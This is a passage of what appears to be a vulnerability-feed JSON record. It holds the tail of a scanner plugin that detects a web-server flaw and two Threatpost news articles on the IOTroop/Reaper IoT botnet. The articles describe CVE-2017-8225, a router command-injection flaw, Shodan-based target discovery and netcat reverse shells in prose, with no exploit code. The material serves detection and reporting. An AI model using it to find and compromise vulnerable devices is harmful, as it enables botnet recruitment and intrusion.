We can verify\n# the payload by looking for some magic bytes that\n# we know exist in the file.\nif (isnull(strstr(res[2], '\\x0a\\x0a\\x0a\\x0a\\x01')))\n{\n audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);\n}\n\nres[2] = data_protection::sanitize_user_full_redaction(output:res[2]);\n\nsecurity_report_v4(\n port: port,\n severity: SECURITY_HOLE,\n file: uri,\n request: make_list(build_url(qs:uri, port:port)),\n output: chomp(res[2]),\n attach_type: 'text/plain'\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:21", "bulletinFamily": "info", "description": "A botnet, which is adding new bots every day, has already infected one million businesses during the past month and could easily eclipse the size and devastation caused by Mirai.\n\nThe malware and botnet, dubbed IOTroop, was spotted in September by researchers at Check Point who warn that 60 percent of corporate networks have at least one vulnerable device.\n\nSimilar to Mirai, the malware targets poorly protected network-connected devices such as routers and wireless IP cameras manufactured by D-Link, TP-Link, Avtech, Netgear, MikroTik, Linksys, Synology and GoAhead.\n\n\u201cSo far we estimate over a million organizations have already been affected worldwide, including the U.S., Australia and everywhere in between, and the number is only increasing,\u201d according to Check Point\u2019s [preliminary research published Thursday](<https://research.checkpoint.com/new-iot-botnet-storm-coming/>).\n\nWhile this malware appears to share some of Mirai\u2019s code, it is new malware and campaign, said Maya Horowitz, group manager of threat intelligence at Check Point, in an interview with Threatpost.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/10/06222318/IoT-Botnet-Trend-of-Attacking-IP-Addresses.png>)\n\n\u201cThis has the potential to be more damaging than Mirai,\u201d Horowitz said. 
\u201cThis is malware that has a much broader range of vulnerabilities to target across a much larger spectrum of products,\u201d she said.\n\nIn October 2016, [Mirai malware spread itself to IoT devices ](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>)gaining access via default password and usernames. The malware then roped affected devices into a botnet and carried out distributed denial of service (DDoS) attacks. The largest of such attacks flooded [DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) causing several well-known websites to go dark for hours.\n\nHorowitz said the IOTroop malware Check Point is examining has similarities to Mirai, such as the recruiting of a global army of network devices capable of launching crippling DDoS attacks.\n\n\u201cThe most interesting difference between this malware and Mirai is that it is far more sophisticated. Attackers are not just exploiting default credentials to compromise devices, but also using a dozen or more vulnerabilities to get on these devices,\u201d she said.\n\nIn the case of the GoAhead wireless IP camera, attackers exploited a well known bypass authentication vulnerability ([CVE-2017-8225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8225>)) identified in March and affecting [more than 1,250 camera models](<http://seclists.org/fulldisclosure/2017/Mar/23>). For other devices such as Linksys RangePlus WRT110 Wireless Router, adversaries are exploiting a remote command execution vulnerability known since 2014. 
[This vulnerability](<https://www.checkpoint.com/defense/advisories/public/2014/cpai-2014-2414.html>) exists because the router\u2019s web interface fails to sanitize ping targets and lacks the use of cross-site request forgery tokens for protection.\n\nResearchers said they have also identified several command-and-control servers used by adversaries behind the malware that update it with ranges of IP addresses to attack.\n\n\u201cEvery infected device gets a range of IP addresses that are used to scan for these dozen or so vulnerabilities,\u201d Horowitz said. \u201cThe malware is mostly self-propagating, with minimal C2 intervention. But we are still studying the malware and reverse engineering it to better understand how it works.\u201d\n\n\u201cWhile we don\u2019t have the completed answers, we do know that the infected devices get a range of IP addresses that the malware is instructed to check for vulnerabilities. And then the IPs of the vulnerable devices are sent back to the C2,\u201d she said.\n\nResearchers believe that the botnet is quickly amassing and may be on the cusp of a massive DDoS attack. 
\u201cOur research suggests we are now experiencing the calm before an even more powerful storm,\u201d wrote researchers.\n\nStill unknown are who the threat actors behind the malware/botnet are, what targets the hackers might have and what the timeline of any attack might be.\n\n\u201cIt is too early to assess the intentions of the threat actors behind it, but it is vital to have the proper preparations and defense mechanisms in place before an attack strikes,\u201d said researchers.\n", "modified": "2017-10-20T14:17:27", "published": "2017-10-20T14:17:27", "id": "THREATPOST:D2E45A61AF79D195D55671053FCCC5BA", "href": "https://threatpost.com/iotroop-botnet-could-dwarf-mirai-in-size-and-devastation-says-researcher/128560/", "type": "threatpost", "title": "\u2018IOTroop\u2019 Botnet Could Dwarf Mirai in Size and Devastation, Says Researcher", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:28:19", "bulletinFamily": "info", "description": "Hackers moved one step closer to launching full-scale DDoS attacks using millions of IoT devices herded into the botnet known as [Reaper or IOTroop](<https://threatpost.com/iotroop-botnet-could-dwarf-mirai-in-size-and-devastation-says-researcher/128560/>).\n\nResearchers at NewSky Security warn that hackers are swapping scripts on forums that can scan the internet for vulnerable IoT devices and dump default or weak credentials from them.\n\n\u201cThis is an important next step for hackers who have taken the concept of an attack and turned it into the foundation of a real one,\u201d said Ankit Anubhav, principal security researcher at NewSky Security.\n\nAnubhav\u2019s investigation led him to an underground forum where a pair of hackers demonstrated a script that exploited a [vulnerability in a China-built wireless camera resold by many vendors](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>).\n\n\u201c(The hackers) have scripts related to a 
weaponized CVE-2017-8225 exploit along with screenshots of the script in action,\u201d Anubhav [wrote in a blog post explaining his research](<https://blog.newskysecurity.com/a-huge-wave-of-iot-zombies-are-coming-42d61d6cada0>).\n\nNewSky Security\u2019s research adds to Check Point\u2019s previous IOTroop research [published last week](<https://threatpost.com/iotroop-botnet-could-dwarf-mirai-in-size-and-devastation-says-researcher/128560/>) that warned the botnet (and corresponding malware) was recruiting a global army of connected devices.\n\nIn its report, Check Point warned that one million IoT devices were already infected with IOTroop malware and 60 percent of corporate networks contained a device vulnerable to one of several vulnerabilities exploitable by adversaries behind the malware. NewSky Security said attackers have moved beyond recruiting bots and are actively developing attack scripts.\n\nThe IOTroop malware targets poorly protected connected devices such as routers and wireless IP cameras manufactured by D-Link, TP-Link, Avtech, Netgear, MikroTik, Linksys, Synology and GoAhead. But because IOTroop doesn\u2019t just exploit default credentials to compromise devices, as did Mirai, it has the potential to do more damage exploiting nearly a dozen vulnerabilities.\n\nLast year, a Mirai botnet attack flooded [DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) causing several well-known websites to go dark for hours.\n\nIn his investigation Anubhav said he reviewed two IOTroop scripts made available by hackers including one that exploited [CVE-2017-8225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8225>), a known authentication bypass vulnerability affecting the wireless IP cameras.\n\n\u201cThe first script uses a Shodan query to dump all IP addresses that are devices vulnerable to CVE-2017-8225 by using a known Shodan dork (query),\u201d NewSky wrote in its report. 
\u201cNow once all vulnerable IPs are collected, the second script uses CVE-2017-8225 to dump credentials for these devices.\u201d\n\n\u201cThis combination will help script kiddies to take control over a variety of IoT devices without worrying about two important questions: where (to find devices, which can be hacked) and how (to hack these devices),\u201d the report said.\n\nIt was also observed that although the thread in hacking forums started with scripts that reveal compromised IoT credentials, it soon shifted toward development of a fully functional botnet that can be propagated. The attackers discussed their inability to run the wget command, and replaced it with a functional netcat to perform a reverse shell. This was also observed in devices infected by IOTroop by both Check Point and NewSky researchers.\n\nThe one piece missing is scale. According to Anubhav, 117,055 devices are vulnerable to CVE-2017-8225. To effectively reach those devices, hackers needed access to Shodan Premium to scale the recruitment and to weaponize vulnerable IoT devices.\n\n\u201cWe noted the exploit author asking for Shodan credentials, and claiming that if he can get access to Shodan Premium, he will set up a botnet for any purpose,\u201d the researcher said. \u201cSoon we observed that a fellow attacker agreed to share his Shodan credentials with the attacker if it will help him form the botnet. Here onward the thread goes silent. No questions asked, no updates.\u201d\n\nAnubhav said, while the CVE-2017-8225 vulnerability was already known, using the Shodan search engine to find vulnerable devices lowers the bar for an attack.\n\n\u201cA huge number of devices vulnerable via CVE-2017-8225 were simply visible in Shodan, just waiting to be attacked. Without any security or patch, they are now vulnerable to become part of the IoTroop botnet,\u201d Anubhav said.\n\nThe identities of the hackers behind the scripts are unknown. 
According to Anubhav, the two have a number of different aliases and use accounts that trace back to several countries scattered around the globe making it impossible to determine a country of origin.\n", "modified": "2017-10-25T14:33:18", "published": "2017-10-25T14:33:18", "id": "THREATPOST:31CC1BF1652AEA543504AB09594E8DAB", "href": "https://threatpost.com/hackers-prepping-iotroop-botnet-with-exploits/128608/", "type": "threatpost", "title": "Hackers Prepping IOTroop Botnet with Exploits", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}